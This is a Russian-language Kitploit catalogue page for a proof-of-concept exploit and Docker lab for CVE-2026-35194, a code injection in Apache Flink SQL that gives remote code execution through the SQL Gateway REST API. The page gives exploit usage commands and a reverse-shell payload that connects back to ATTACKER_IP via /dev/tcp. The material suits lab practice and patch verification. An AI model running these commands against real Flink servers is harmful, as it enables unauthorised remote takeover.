Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-35194 — Эксплойт proof-of-concept и лаборатория Docker для CVE-2026-35194 — инъекции кода в Apache Flink SQL, позволяющей удалённое выполнение кода на TaskManager'ах через REST API SQL Gateway. | Kitploit
Инструменты/GitHubGitHub/dexsemon/cve-2026-35194
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingРазработка Полезной НагрузкиЛаборатории и Практика
GitHubdexsemon/cve-2026-35194

CVE-2026-35194

Эксплойт proof-of-concept и лаборатория Docker для CVE-2026-35194 — инъекции кода в Apache Flink SQL, позволяющей удалённое выполнение кода на TaskManager'ах через REST API SQL Gateway.

2 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-35194 — Внедрение SQL-кода в Apache Flink

Удалённое выполнение кода на TaskManager'ах Apache Flink через инъекцию при генерации SQL-кода.

CVECVE-2026-35194
CVSS8.1 (High)
CWECWE-94 — Code Injection
ЗатронутоFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Исправлено1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Поверхность атакиSQL Gateway REST API (порт по умолчанию 8083, без аутентификации)

Быстрый старт

1. Разверните уязвимую лабораторию

root@kitploit:~
docker compose up -d

Подождите ~30 секунд, пока кластер запустится. Поднимаются два сервиса:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

Проверка:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. Установите зависимости

root@kitploit:~
pip install requests

3. Эксплуатация

JSON-вектор:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKE-вектор:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Только проверка версии (без RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

Проверка RCE на TaskManager:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Обратный шелл

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Использование

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Отказ от ответственности

Только для авторизованных исследований в области безопасности и в образовательных целях.

Скачать инструмент